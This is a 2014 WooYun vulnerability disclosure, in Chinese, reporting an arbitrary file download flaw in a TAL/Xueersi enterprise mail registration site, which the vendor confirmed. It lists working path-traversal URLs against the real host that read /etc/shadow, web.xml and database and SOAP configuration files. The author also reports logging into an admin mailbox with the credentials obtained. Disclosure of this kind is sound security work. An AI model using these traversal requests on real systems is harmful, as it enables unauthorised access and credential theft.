当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-072330

漏洞标题:学而思(好未来)企业邮箱相关系统敏感信息可被获取

相关厂商:好未来集团学而思培优

漏洞作者: Coffee

提交时间:2014-08-14 10:32

修复时间:2014-09-28 10:34

公开时间:2014-09-28 10:34

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-14: 细节已通知厂商并且等待厂商处理中
2014-08-14: 厂商已经确认,细节仅向厂商公开
2014-08-24: 细节向核心白帽子及相关领域专家公开
2014-09-03: 细节向普通白帽子公开
2014-09-13: 细节向实习白帽子公开
2014-09-28: 细节向公众公开

简要描述:

任意文件下载漏洞,可获取网站源代码、数据库连接配置文件、系统配置文件、shadow等,进而获取某管理员邮箱。

详细说明:

#1、存在问题的页面
好未来企业邮箱注册系统

下载插件.jpg


插件下载:http://youxiang.100tal.com/regmail/download.action?file=plugin/MacAddressViewer/MacAddressViewer.msi
file参数未过滤,导致任意文件下载。
#2、任意文件下载
仅以部分文件为例:
源代码:http://youxiang.100tal.com/regmail/download.action?file=index.jsp
shadow:http://youxiang.100tal.com/regmail/download.action?file=/plugin/../../../../../../etc/shadow
得到服务器的部分用户,密文就不贴上来了:l***e zh***an m***yuan l***a h***iao l***ei
web.xml:http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/web.xml
#3、继续挖掘
读取web.xml,又进而得到以下文件:
http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/config/core/applicationContext.xml
http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/datasource.properties
http://youxiang.100tal.com/regmail/download.action?file=/plugin/..//WEB-INF/classes/prop.properties
其中,datasource.properties保存了数据库连接配置:
jdbc.url = jdbc:mysql://192.168.1.111:3409/regmail?zeroDateTimeBehavior=convertToNull&characterEncoding=UTF-8
jdbc.user = RegMail
jdbc.password = 略
prop.properties保存了部分系统配置,包括员工中心soap接口、管理员邮箱(发信邮箱?未验证)等:
#员工中心接口地址根路径
user.center.rootpath=http://oas.xueersi.org/
#员工中心soap接口fsite值
usercenter.soap.fsite=5
#员工中心soap接口uskey值
usercenter.soap.uskey=略
得到的邮箱和密码可登录:(未翻看邮件,仅截图组织通讯录证明危害)

14102125419d6f78cec02d8eb3f6b5ce0b462279.jpg

漏洞证明:

http://youxiang.100tal.com/regmail/download.action?file=/plugin/../../../../../../etc/shadow
http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/datasource.properties
http://youxiang.100tal.com/regmail/download.action?file=/plugin/..//WEB-INF/classes/prop.properties

14102125419d6f78cec02d8eb3f6b5ce0b462279.jpg

修复方案:

#1、下载文件处过滤非法路径
#2、写的很简略,但猜路径猜文件名走各种弯路累死了……求高rank

版权声明:转载请注明来源 Coffee@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-14 14:45

厂商回复:

非常严重的漏洞,非常感谢白帽对学而思培优的支持,正在积极修复

最新状态:

暂无